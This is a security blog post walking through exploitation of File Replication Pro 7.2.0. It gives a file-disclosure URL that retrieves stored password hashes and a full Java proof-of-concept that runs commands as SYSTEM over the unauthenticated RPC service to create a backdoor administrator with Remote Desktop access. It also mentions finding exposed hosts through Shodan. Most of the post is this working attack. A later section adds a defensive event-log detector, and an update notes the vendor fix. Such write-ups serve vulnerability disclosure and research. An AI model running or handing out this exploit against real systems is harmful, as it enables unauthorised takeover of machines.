Exploiting File Replication Pro 7.2.0

* The information found in this post is for educational purposes only and not to be used for illegal purposes *

Recently, a security advisory on the vulnerabilities found in File Replication Pro 7.2.0 was released on this site. This post shows the steps involved to remotely gain access to the system that has this software installed. As of the date of this post, the trial version of FRP 7.2.0 is still available for download at http://www.filereplicationpro.com.

* Note: A quick search on shodan.io with the keywords “FRP Node Ready” shows quite a number of vulnerable systems out there. *

That aside, the first step will be to install the software. We will be using a Windows 7 machine for this demonstration. After running the installer, a few services are added to startup, namely three ‘prunsrv.exe’ processes as shown below. Note that the services run under the privileges of the NT AUTHORITY\SYSTEM account:

[screenshot: frp1]

The unauthenticated remote command execution vulnerability abuses the way these processes handle password authentication to achieve command execution as the NT AUTHORITY\SYSTEM user. Using a browser, navigate to port 9200 on localhost, which runs the replication RPC service. You should see the following:

[screenshot: frp2]

The “OK” at the end of the “>> FRP Node Ready>> C24EB17AEF0D61>> OK” output indicates that the RPC server does not require any form of authentication; this is the default behaviour in a vanilla install. If you instead see an “ERROR”, the RPC server is configured with a password and authentication is required. However, a second vulnerability in the software allows unauthenticated remote file access, which can be abused to retrieve that password hash. FRP password hashes and configuration can be accessed remotely and without authentication using the following link:

http://127.0.0.1:9100/DetailedLogReader.jsp?log_path=C:\Program+Files\FileReplicationPro\\etc\\configuration.xml

You should see the password hash in the configuration.xml file. If more clients have been added to the FRP management server, you will also see all of their password hashes there. If you explore further, look into the .jar and .war files found in the installation directory, and figure out how the software works, you can then proceed to create a malicious RPC client, which in this example adds an arbitrary user to the remote system and then adds this user to both the Administrators and Remote Desktop Users groups.

The following exploit code is used in this example. Remember to replace the IP, port, and password variables accordingly:

/**
 * @author Jerold Hoong (Vantage Point Security)
 * File Replication Pro <= v7.2.0
 * Remote Command Execution PoC Working Exploit
 * www.vantagepoint.sg
 * NOTE: Include the FRP libraries (the .jar files from the installation directory) to compile
 */

import java.io.IOException;
import java.util.HashMap;
import java.util.Map;
import net.diasoft.frp.engine.exception.RPCException;
import net.diasoft.frp.engine.model.AddressPort;
import net.diasoft.frp.engine.tcp.client.RPCDriver;
import net.diasoft.frp.engine.tcp.client.TCPConnection;

public class Main {

    static String ip = "1.2.3.4";
    static int port = 9200;
    // The password string can be retrieved through the remote file disclosure vulnerability (configuration.xml).
    // If no password is set, leave the string blank.
    // Use a browser to navigate to :9200. "OK" = no authentication, "ERROR" = authentication required.
    static String password = ""; // e.g. password 12345 = jLIjfQZ5yojbZGTqxg2pY0VROWQ=

    // Issues one ExecCommand RPC call. A null command sends the call without a COMMAND
    // parameter (used once to verify the RPC channel). Returns the reply map, or null on error.
    static Map<?, ?> execCommand(RPCDriver rpc, String command) {
        HashMap<String, String> params = new HashMap<>();
        if (command != null) {
            params.put("COMMAND", command);
        }
        try {
            Map<?, ?> r = rpc.callFunction("ExecCommand", params);
            System.out.print("Success!\n");
            return r;
        } catch (RPCException | IOException | ClassNotFoundException e) {
            e.printStackTrace();
            return null;
        }
    }

    public static void main(String[] args) {

        AddressPort ap = new AddressPort(ip, port);
        AddressPort[] addresses = {ap};
        TCPConnection tcpConnection;

        try {
            tcpConnection = new TCPConnection(addresses, password, true);
        } catch (Exception e) {
            // Without a connection the RPC driver cannot be used; stop here instead of
            // failing later with a NullPointerException.
            e.printStackTrace();
            return;
        }

        System.out.print("Connecting to host...");
        RPCDriver rpc = new RPCDriver(tcpConnection);

        // Initial call with no COMMAND parameter to verify the RPC channel works
        execCommand(rpc, null);

        // add new user
        System.out.print("Attempting to add user 'vantagepoint' with password 'LOLrofl1337!': ");
        execCommand(rpc, "net user vantagepoint LOLrofl1337! /add");

        // add new user to Admin group
        System.out.print("Attempting to add user 'vantagepoint' to 'Administrators' group: ");
        execCommand(rpc, "net localgroup \"Administrators\" vantagepoint /add");

        // add new user to RDP group
        System.out.print("Attempting to add user 'vantagepoint' to 'Remote Desktop Users' group: ");
        execCommand(rpc, "net localgroup \"Remote Desktop Users\" vantagepoint /add");

        System.out.print("\n\n---- END ----\n\n");
    }
}

The following screenshot shows the list of users on the Windows 7 system, before the exploit code was executed:

[screenshot: frp3]

After the exploit code was successfully executed:

[screenshot taken 2016-02-15 at 11:40 PM]

[screenshot: frp4]

[screenshot: frp5]

If RDP was not activated on the remote host, you can always tweak the commands in the exploit to activate it. You should now be able to RDP to the box as an Administrator.
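From the defender's side, the post-exploitation pattern above (an account created and, seconds later, added to the Administrators and Remote Desktop Users groups) is easy to correlate in Windows Security events 4720 and 4732. The following detection is an added example, not part of the original post or of FRP; the event lines are constructed in a simplified key=value form, and the machine-account subject WIN7$ and the 300-second window are assumptions.

```python
import re
from datetime import datetime, timedelta

# Group additions the exploit performs; an add into either right after account creation is the signal.
PRIVILEGED_GROUPS = {"Administrators", "Remote Desktop Users"}
# Simplified, constructed record format: <iso-time> id=<event id> subject=<actor>
# target=<account> [group=<local group>]
EVENT_RE = re.compile(r"(\S+) id=(\d+) subject=(\S+) target=(\S+)(?: group=(.+))?$")

# Constructed sample events (not real logs): the first block mirrors what the
# exploit's "net user /add" and "net localgroup /add" produce when run as
# SYSTEM (subject shown as the machine account, assumed here as WIN7$); the
# last two are a routine onboarding hours apart that must not fire.
SAMPLE_EVENTS = [
    "2016-02-15T23:39:58 id=4624 subject=WIN7$ target=jsmith",
    "2016-02-15T23:40:12 id=4720 subject=WIN7$ target=vantagepoint",
    "2016-02-15T23:40:13 id=4732 subject=WIN7$ target=vantagepoint group=Administrators",
    "2016-02-15T23:40:14 id=4732 subject=WIN7$ target=vantagepoint group=Remote Desktop Users",
    "2016-02-15T09:01:00 id=4720 subject=helpdesk target=newhire",
    "2016-02-15T11:30:00 id=4732 subject=helpdesk target=newhire group=Remote Desktop Users",
]

def parse_event(line):
    """Parse one record line into a dict, or None if it does not match."""
    m = EVENT_RE.match(line.strip())
    if not m:
        return None
    ts, eid, subject, target, group = m.groups()
    return {"time": datetime.fromisoformat(ts), "id": int(eid),
            "subject": subject, "target": target, "group": group}

def find_suspicious(lines, window_seconds=300):
    """Return (target, group, subject) for every privileged-group add (4732)
    that follows creation of the same account (4720) within window_seconds."""
    events = sorted(filter(None, map(parse_event, lines)), key=lambda e: e["time"])
    created = {}  # account -> time it was created
    hits = []
    for ev in events:
        if ev["id"] == 4720:
            created[ev["target"]] = ev["time"]
        elif ev["id"] == 4732 and ev["group"] in PRIVILEGED_GROUPS:
            t0 = created.get(ev["target"])
            if t0 is not None and ev["time"] - t0 <= timedelta(seconds=window_seconds):
                hits.append((ev["target"], ev["group"], ev["subject"]))
    return hits

if __name__ == "__main__":
    for target, group, subject in find_suspicious(SAMPLE_EVENTS):
        print(f"ALERT: account {target} created and added to '{group}' by {subject}")
```

On the sample data only the vantagepoint account fires, once per group; a subject that is a machine account (ending in $) is a further hint that the command ran as SYSTEM, which is how the FRP services execute it.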

Here is a video showing the exploit in action:

Update: After a long time, the guys at FRP finally released the fixed version: https://frpsupport.fogbugz.com/default.asp?W291

[screenshot: frp2016-730-released]
